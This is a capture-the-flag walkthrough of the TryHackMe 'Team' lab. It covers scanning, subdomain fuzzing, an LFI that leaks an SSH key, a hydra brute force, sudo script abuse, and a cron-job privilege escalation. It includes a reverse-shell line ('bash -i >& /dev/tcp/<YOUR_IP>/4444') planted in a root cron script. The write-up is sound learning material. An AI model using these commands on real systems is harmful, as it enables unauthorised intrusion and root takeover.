Skip to content

Latest commit

 

History

History

team

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
images
images
 
 
README.md
README.md
 
 

README.md

Team

Beginner friendly boot2root machine

Scan the Machine

If you are unsure how to tackle this, I recommend checking out the Nmap Tutorials by Hack Hunt.

nmap -sV -Pn <IP>

Nmap Scan

Looks like we have three ports open: 21, 22, 80

Let's check the webpage as port 80 is open. Well its just the Apache Server Default Page. Nothing much really.

I tried different things, didn't find much:

  • 🙅 Nothing on GoBuster
  • 🙅 Nothing using enum4linux

Then I checked the source code and found something interesting in the TITLE.

Source Code

It says to add team.thm to the HOSTS file.

Add to HOSTS

I checked the link in the browser with team.thm. It gives me a google search results. But on the TOP is says go to the website, so I did. The result was fascinating.

Different Webpage

I don't know about you guys! But I was little surprised with the result. Therefore, I did some search and found this is called Virtual Host Routing.

So with a new domain I tried to run the GoBuster Again: gobuster dir -u http://team/thm -w /var/share/wordlists/dirb/common.txt -x txt,php,html

GoBuster Results

robots.txt file looks interesting so I checked the file in the browser team.thm/robots.txt. Huh! Just a four letter word 'dale'. Well it can be username.

As through Nmap scan we know that ssh port is open. We can now bruteforce hydra -l dale -P rockyou.txt ssh://<IP>

I waited for like hours but didn't found anything 😭

Let's try WFUZZ to check for subdomains. wfuzz -c -u http://team.thm -H "Host:FUZZ.team.thm" -w <wordlist>

Wordlist I used is from SecLists. Also, we you are not sure of this commands like GoBuster and WFUZZ check Advent Of Cyber 2 on TryHackMe (Day 4).

When I tried to run the command there were two many results. So I stopped and add --hw 977 as most of the files has this word counts.

WFUZZ

Seems like we found subdomain dev. So this is what HINT was about. Let's add the subdomain to HOSTS file and check the site.

Adding Subdomain

I added dev.team.thm and www.dev.team.thm.

Checking Subdomain

Clicking on the links takes us to another page.

Click Link

Seems like a script is running and a page variable. Wonder if the HINT was about this too 😇.

User Flag

BAAAAM! We got the user flag. We know that dale is a user and the flag can be in dale's root directory.

We can try for LFI here, FIRE UP your BurpSuite.

  1. Capture the Request
  2. Send it to intruer

BurpSuite

  1. Select payload. For this I used Wordlist from PayloadsAllTheThings.

As the port 21, 22 are open. I first looked for the file:

  • /etc/ssh/ssh_config
  • /etc/ssh/sshd_config
  • /etc/vsftp.config

After looking through this files. I found SSH Key of DALE in sshd_config file. We have a SSH Key. Copy the content from ----BEGIN.. and paste in the file. I named the file id_rsa (this is the general name used). Use chmod 600 id_rsa (this is the general permissions of a SSH Key). Connect using ssh -i id_rsa dale@<IP>

Got SSH

BOOM! We got the access. Now first thing I do is check for sudo list commands. That can be done using sudo -l

Sudo

There is a file which can be run using gyles user. Let's check the content of the file.

Content

Seems like a file which takes input from the user. Specially $error variable seems to interact with SHELL. What if we give input /bin/bash.

Run Rights

Run the file with gyles rights, so that we can get access to that user.

Bash input

We can work with this as a shell. However, I learnt something like Shell Stabilization in Advent of Cyber 2 (Day 24)

Run command -> python -c 'import pty;pty.spawn("/bin/bash")'

Shell Stable

BAAM! We got stable shell as gyles. We didn't have the password of this account. So sudo -l is not a good idea.

I was kinda in trouble here however I had linPEAS to rescue.

Fireup another shell and transfer linpeas.sh to the machine using scp -i id_rsa <location_in_your_pc> [email protected]:..

File Transfer

This will transfer the file to the home directory of dale.

Let's run the file and see what kind of results we have.

Run LinPEAS

There is a lot of information. But we are interested in the lines with RED color.

  • User is in admin group.
  • sudo version is 1.8.21p2.
  • /usr/local/bin
    • It is writeable directory and has a file
    • In cron jobs I see the file main_backup.sh which is in the same dir.
  • /var/backups/www/team.thm/scripts/scripts.old

File Found

Seems like a bash command and this file can be edited, as gyles is in admin group. Also, we know that this file runs as root (cronjobs` found via linPEAS).

Therefore, we can add the famous bash one liner to get a shell as root.

  • Open the file using nano main_backup.sh
  • Add the Bash CMD -> bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1.
  • Press Ctrl+X, then Y and then ENTER.

Bash Command

Start a listner using nc -lvnp 4444

Listener

Wait for a while and you will have a shell as a root

Root Access

You know what to do next 😜

Root Flag